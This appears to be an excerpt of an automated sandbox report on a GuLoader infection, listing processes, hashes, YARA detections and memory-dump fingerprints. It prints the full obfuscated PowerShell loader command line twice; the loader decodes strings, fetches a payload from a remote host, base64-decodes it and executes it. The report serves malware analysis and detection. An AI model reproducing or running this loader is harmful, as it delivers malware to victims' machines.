Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende 'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr BanguD tabeTrafi ') ;Unschool 
$Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn ,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool (Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu ');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg. F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. 
Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk e Ek p)Hy,ro ');Unschool $Owertaen;"
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:15:08:44
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:15:08:46
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
                                                                                                  Imagebase:0x7ff68faa0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:15:08:53
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' 
Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende 'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr BanguD tabeTrafi ') 
;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn ,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool (Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu ');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg. F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. 
Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk e Ek p)Hy,ro ');Unschool $Owertaen;"
                                                                                                  Imagebase:0x520000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:15:08:54
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
                                                                                                  Imagebase:0x240000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:15:09:09
                                                                                                  Start date:23/05/2024
                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                  Imagebase:0x220000
                                                                                                  File size:516'608 bytes
                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e027d2fee868320f86a2a6b2ef64dd251bfb87a9a681c3abc88428c54b07258c
                                                                                                    • Instruction ID: a372160bec3eb2598ae3667196c38e76c24bf5bf3bacffaffcf03e129d10b2a1
                                                                                                    • Opcode Fuzzy Hash: e027d2fee868320f86a2a6b2ef64dd251bfb87a9a681c3abc88428c54b07258c
                                                                                                    • Instruction Fuzzy Hash: F5F1B730A09A8E8FEBA8DF68C8557F937D1FF58310F04426EE84DC76A5DB3499458B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53e059868f0aec88c77a9c72aa2b05c97d429050475db6ecbc688cadd1a39eea
                                                                                                    • Instruction ID: 732ea9e75b558554c1a67a9f78842e56a074329f46ccd1f838462aff2281f769
                                                                                                    • Opcode Fuzzy Hash: 53e059868f0aec88c77a9c72aa2b05c97d429050475db6ecbc688cadd1a39eea
                                                                                                    • Instruction Fuzzy Hash: 0DE1E730A09A8D8FEBA8DF68C8657E977D1FF58310F04426ED84DC7295DF78A9418B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7a549924170a3c63bccb26fdee73457b3b559a601fd5c6615da4b561722c9ea1
                                                                                                    • Instruction ID: 19af98dbd8178c78eedb6ed6e8a1648f6aeb9bb40154234fef767110c660a7de
                                                                                                    • Opcode Fuzzy Hash: 7a549924170a3c63bccb26fdee73457b3b559a601fd5c6615da4b561722c9ea1
                                                                                                    • Instruction Fuzzy Hash: 73225B21B1F7CA1FE766D76848B56687BE0EF56210B1901FFD09DC72E3DA185905C341
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc6457cdba2d1b07adf2d6fb88185e94a46fe808604c56add35716c62a3c79c4
                                                                                                    • Instruction ID: 305d70250abe92db87ef2c3c09bb632ffc9fa6b1173349a4500519d51c04775e
                                                                                                    • Opcode Fuzzy Hash: fc6457cdba2d1b07adf2d6fb88185e94a46fe808604c56add35716c62a3c79c4
                                                                                                    • Instruction Fuzzy Hash: 8EB13422B1FA8E5FEBE5DB6848A55B87BD1EF55220B1901BBD04DCB1F3DA18AD018341
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72660072d8cc71cbf7b1070c509bf03f512d53eb8babb4542e8995d20984bdb4
                                                                                                    • Instruction ID: 5c73bc14ed3b212c6e20ccb881cde0f4e8c97709293c244e722bcc5d7c15e5c1
                                                                                                    • Opcode Fuzzy Hash: 72660072d8cc71cbf7b1070c509bf03f512d53eb8babb4542e8995d20984bdb4
                                                                                                    • Instruction Fuzzy Hash: A6814B3071CA494FDB99EB5CC8A4AB5B7E1FF99350B1005BDD08AC72A6DA25F842CB40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68a2c2ca3b9f8f932dbd2c691fcfd118cd6f8641a471769b8b750b1de7cd26e7
                                                                                                    • Instruction ID: 0b24bf90e0c9f22d23b84bc6cdfad24da1ddc237151eaf0e729fa7028f04f958
                                                                                                    • Opcode Fuzzy Hash: 68a2c2ca3b9f8f932dbd2c691fcfd118cd6f8641a471769b8b750b1de7cd26e7
                                                                                                    • Instruction Fuzzy Hash: C651E162B2FA8A1FE7A5D66848B17BC67D1EF51350B5A00BED06DC72E3DD18A8008301
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2193534742.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0294e1e9408492469c18d3dce5ae33f7717746da61d7335b2794c169a3524b06
                                                                                                    • Instruction ID: b67a65ad3f77425dba6df81ebcb8e760bf9511ba69f2f5c80e2bed5e8d51d5c7
                                                                                                    • Opcode Fuzzy Hash: 0294e1e9408492469c18d3dce5ae33f7717746da61d7335b2794c169a3524b06
                                                                                                    • Instruction Fuzzy Hash: D8310812F2FACA5BF7F5975818B617867C1EF50664F6901BAD45DCB1F2ED0C6C004242
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                    • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2192769471.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6415cb9a47e564a4e54c934c54b3c2b385bf31bb1792a84ca8572ed13d1854e
                                                                                                    • Instruction ID: 0c20d8b19affde8ee36161fef7b01aee6081cb81812c7bf928cdcf9b4b6777b4
                                                                                                    • Opcode Fuzzy Hash: e6415cb9a47e564a4e54c934c54b3c2b385bf31bb1792a84ca8572ed13d1854e
• Instruction Fuzzy Hash: 16F1E557B0F6DA4FE733A7A91CB50A57F50EF2725470E01FBC4D88A0E39D196A06C262

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: (fwl$(fwl$(fwl$(fwl$x.hk
• API String ID: 0-1339419433
• Opcode ID: 8feb858f48a93aafe2979748fe77bd223f9097caf876c71093be62b45c65cbcc
• Instruction ID: 72db792a5203c1e653ef9f4cad450678f19a29449d99110100eb78ebd81af3be
• Opcode Fuzzy Hash: 8feb858f48a93aafe2979748fe77bd223f9097caf876c71093be62b45c65cbcc
• Instruction Fuzzy Hash: 13B192F4B001049FEB24DBA8C655BAAB7E3EF84304F1480A9E901AF755CB71EC51DBA5

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$x.hk$x.hk$-hk$-hk
• API String ID: 0-2167855781
• Opcode ID: 842a0bd7059afe549730518567574c2c50683d43b6f153af392a6ea48c32ef7b
• Instruction ID: 1a0f894f743f3481493cd8b9ba7c1749eb1e34bca6be07c1dfaf279579748fad
• Opcode Fuzzy Hash: 842a0bd7059afe549730518567574c2c50683d43b6f153af392a6ea48c32ef7b
• Instruction Fuzzy Hash: 4A92D3F0A00209CFDB24DFA8C950B9ABBB2EF85314F1484AAD5059F751CB31ED85DBA1

Strings
Memory Dump Source
• Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$x.hk$x.hk$x.hk$-hk$-hk
• API String ID: 0-497940369
• Opcode ID: 086a3569fb8034f6e848b85e89b17e1108295cf311c50978ca64848d0b39ebf2
